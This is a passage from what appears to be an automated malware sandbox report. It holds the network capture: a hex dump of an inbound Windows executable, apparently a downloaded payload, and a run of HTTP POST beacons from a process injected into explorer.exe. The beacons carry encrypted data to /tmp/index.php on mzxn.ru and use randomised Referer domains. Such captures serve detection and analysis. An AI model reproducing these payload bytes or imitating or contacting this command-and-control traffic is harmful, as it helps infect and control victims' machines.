program cannot be run in DOS mode.$PEdlZA"\Z@p`xD`X.text `.rdataPL@@.data0 @.CRTP@@.relocX`@B
Jul 27, 2024 08:54:02.842106104 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 57 Data Ascii: AWAVAUATVWUSHH-Xl$(D5QDt$0D$(D$48AcqAqw3A]Uqw3fffff.=#Y=8=\|(=/2t=uL$&D$'0GwAE
Jul 27, 2024 08:54:02.842143059 CEST	1236	IN	Data Raw: d2 0f 44 f7 45 84 c9 0f 44 f7 66 90 81 fe 89 ee d9 12 7f 78 81 fe 3a c2 31 ce 0f 8f fc 00 00 00 81 fe 05 3b ec ae 0f 8f 0c 02 00 00 81 fe 5d 9b 1e 9c 0f 8f d5 03 00 00 81 fe 3b d2 d3 8c 0f 8e 63 07 00 00 81 fe f8 a0 fd 96 0f 8e 29 0c 00 00 81 fe Data Ascii: DEDfx:1;];c)EC5uD$D$DL$hf\|K4@0\|:<6.:8:899: L$X
Jul 27, 2024 08:54:02.842175961 CEST	1236	IN	Data Raw: fb ff ff 81 fe 94 f4 98 0a 0f 8e d5 05 00 00 81 fe 06 5d 3b 0f 0f 8e c8 0a 00 00 81 fe 07 5d 3b 0f 0f 84 3d 13 00 00 81 fe 64 e5 f0 10 0f 84 4b 13 00 00 81 fe e1 5c 3f 11 0f 85 f9 fa ff ff 44 8b 8c 24 f8 00 00 00 44 0f af 8c 24 d0 01 00 00 45 89 Data Ascii: ];];=dK\?D$D$EAE!D$999Tv){*{"}V2~D$D$ D$D$$D$D$(DYAyA=I
Jul 27, 2024 08:54:02.842212915 CEST	1236	IN	Data Raw: f6 ff ff 81 fe 49 fa 3f 58 0f 8f bd 08 00 00 81 fe e3 62 e0 55 0f 84 5c 11 00 00 81 fe cd ae cd 56 0f 85 3d f6 ff ff 4c 8b 8c 24 50 02 00 00 45 0f b6 09 44 8b 74 24 2c 41 ff c6 44 8b 54 24 2c 47 88 0c 10 44 8b 8c 24 64 01 00 00 44 89 8c 24 c4 00 Data Ascii: I?XbU\V=L$PEDt$,ADT$,GD$dD$PG$DL$0D$/^^Y\|$F~_u\(DL$<D$D$ D$?}:E@?~DL$HAD$X
Jul 27, 2024 08:54:02.842246056 CEST	1236	IN	Data Raw: 44 89 8c 24 cc 00 00 00 e9 83 f1 ff ff 81 fe 88 fe 14 5e 0f 84 b6 0f 00 00 81 fe 10 59 3f 5f 0f 85 6b f1 ff ff 44 8b 0d 64 fe 0e 00 44 8b 15 61 fe 0e 00 44 89 94 24 90 01 00 00 45 8d 51 01 45 0f af d1 45 89 d1 41 83 f1 fe 45 21 d1 44 89 8c 24 94 Data Ascii: D$^Y?_kDdDaD$EQEEAE!D$1TOZD$DL$8D$DL$<DL$8AAh%AtDL$DL$ DL$8D$DL$<D$:CeE
Jul 27, 2024 08:54:02.842278957 CEST	1236	IN	Data Raw: c1 44 89 8c 24 d8 01 00 00 44 8b 4c 24 68 46 0f b6 0c 09 44 88 4c 24 24 be 94 64 3b 6f e9 9a ec ff ff 81 fe a4 16 e3 71 0f 84 95 0e 00 00 81 fe 1c 4e 37 72 0f 85 82 ec ff ff be 5a 4e fa 05 e9 78 ec ff ff 81 fe 19 68 60 cc 0f 84 ad 0e 00 00 81 fe Data Ascii: D$DL$hFDL$$d;oqN7rZNxh`}`Vh%7%>4PDDD$EQEAD$VS{TD
Jul 27, 2024 08:54:02.842313051 CEST	1000	IN	Data Raw: ff c1 44 89 8c 24 e4 01 00 00 be 1f c5 74 ff e9 d4 e7 ff ff 44 8b 4c 24 60 45 01 c9 44 89 8c 24 a8 01 00 00 be 14 af 62 29 e9 ba e7 ff ff 44 8b 4c 24 4c 49 01 c9 4c 89 8c 24 50 02 00 00 be cd ae cd 56 e9 a0 e7 ff ff be 30 c4 7f a1 e9 96 e7 ff ff Data Ascii: D$tDL$`ED$b)DL$LIL$PV0DL$DT$DD0ZNZNfN7r\DAAD$DL\|A1'AAL\|E1D@0t+AL$D$D$DL$\|D$
Jul 27, 2024 08:54:02.842349052 CEST	1236	IN	Data Raw: dd 34 fb f0 0f 85 f6 e3 ff ff be e9 95 a9 3f e9 ec e3 ff ff 44 8b 94 24 50 01 00 00 41 f7 d2 41 83 ca fe 41 83 fa ff 40 0f 94 c6 44 8b 8c 24 48 01 00 00 41 83 f9 0a 40 0f 9c c7 40 30 f7 be dd c6 8c d6 bf dd c6 8c d6 75 05 bf 1c 4e 37 72 41 83 f9 Data Ascii: 4?D$PAAA@D$HA@@0uN7rAMAEDt$,D$DL$HD$D$D$EA@?E_S]UDNDKD$EQEAD$!DL$DL$ADL$
Jul 27, 2024 08:54:02.842386007 CEST	1236	IN	Data Raw: 00 83 cd 01 be 7b fd ad 54 44 8b 8c 24 58 01 00 00 44 89 8c 24 cc 00 00 00 e9 0e df ff ff 44 8b 4c 24 04 41 c1 e9 08 45 89 ca 41 81 f2 fe ff ff 00 45 21 ca 44 8b 4c 24 08 44 89 d6 f7 d6 44 89 cf f7 d7 41 89 f4 41 81 e4 b5 90 bb 41 41 81 e2 4a 6f Data Ascii: {TD$XD$DL$AEAE!DL$DDAAAAJoDEAAJoDAE1Dt$DDL$AAAD$DD$DD$tzDsD$DhD$D$AD$\??DL$E
Jul 27, 2024 08:54:02.847695112 CEST	1236	IN	Data Raw: 48 83 ec 20 41 b8 c3 00 00 00 e8 69 0d 00 00 48 83 c4 20 b8 cd 06 8b 7a e9 0b fe ff ff 3d d4 e3 b1 8b 0f 84 e2 01 00 00 3d 20 9c 25 9c 0f 85 f5 fd ff ff 48 83 ec 20 31 c9 31 d2 45 31 c0 e8 35 0d 00 00 48 83 c4 20 89 c7 48 83 ec 20 e8 a6 0b 00 00 Data Ascii: H AiH z== %H 11E15H H HAH =u:REH=+LAAED0E=RSb}==dk+a==\KHEHEQ5A6=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50692	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:03.840239048 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kabrxolnvhyrwjnc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: mzxn.ru
Jul 27, 2024 08:54:03.840239048 CEST	286	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 01 6b 2c 90 f4 76 0b 75 26 1f ad e4 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA ,[k,vu&r~{DiOk-V`/Z'Eg,(NJqI!yQz;&VuK K~vr\| `ajIS
Jul 27, 2024 08:54:05.051981926 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:54:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50693	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:05.061479092 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dbnuufytckctj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 235 Host: mzxn.ru
Jul 27, 2024 08:54:05.061480045 CEST	235	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 47 2f f8 84 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vuG/PanoVye"gOaehA;MlLRPoF,K6^E#KIc*[G=i)pBJ{yAu~N
Jul 27, 2024 08:54:06.289181948 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:54:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50694	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:06.298154116 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://alsfxtrkgnqwrtmu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: mzxn.ru
Jul 27, 2024 08:54:06.298177004 CEST	338	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 6c 02 bb 93 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vul_>a\B{pYz,?>EVSJ/nC=x:55`*jML1:Qsx7;:N$w2X\|zl$l_P
Jul 27, 2024 08:54:07.532911062 CEST	206	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:54:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50699	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:17.779897928 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jhgsrssviwperqc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 321 Host: mzxn.ru
Jul 27, 2024 08:54:17.779931068 CEST	321	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 07 6b 2c 90 f4 76 0b 75 5c 07 da b5 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA ,[k,vu\^{j#8g)-<}\KCr5SC$~/QXRyS)LX et)nX},%z@VQG\|627v
Jul 27, 2024 08:54:18.994676113 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:54:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50700	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:19.006902933 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qtugjgfklgqqb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 345 Host: mzxn.ru
Jul 27, 2024 08:54:19.006932020 CEST	345	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 67 5d fc af Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vug]tk{=]\f^rB;@M?'K)SJiWO8a aOBOwDGi*{"T00BQ^p?\| ZZN;
Jul 27, 2024 08:54:20.238903999 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:54:19 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50702	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:20.251796961 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lgvneckioyenslmr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 116 Host: mzxn.ru
Jul 27, 2024 08:54:20.251830101 CEST	116	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 6c 03 b3 f9 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vulWxA=w}Csd_k
Jul 27, 2024 08:54:21.519078970 CEST	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:54:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50705	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:22.912502050 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hqtvwjoqbrnqlnm.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 353 Host: mzxn.ru
Jul 27, 2024 08:54:22.912502050 CEST	353	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 05 6b 2c 90 f4 76 0b 75 75 15 bf 9d Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA ,[k,vuuSWIK=!^3pjp6uvS;2^OH:#b%-7={OX?y-WJ;7^D-uw96ak`G
Jul 27, 2024 08:54:24.156234980 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:54:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50708	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:24.176683903 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oumdrdjjbggqm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 180 Host: mzxn.ru
Jul 27, 2024 08:54:24.176683903 CEST	180	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 4e 40 fd 8b Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vuN@`]vS<,_$49<-;jHF"=JrQZ%SP:8Rwcr>6
Jul 27, 2024 08:54:25.551779985 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:54:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50710	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:25.560869932 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gwdkbhdjbqj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 136 Host: mzxn.ru
Jul 27, 2024 08:54:25.560920954 CEST	136	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 62 4b df 91 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vubK\|UzbphB}[ELx@ncy
Jul 27, 2024 08:54:26.753503084 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:54:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 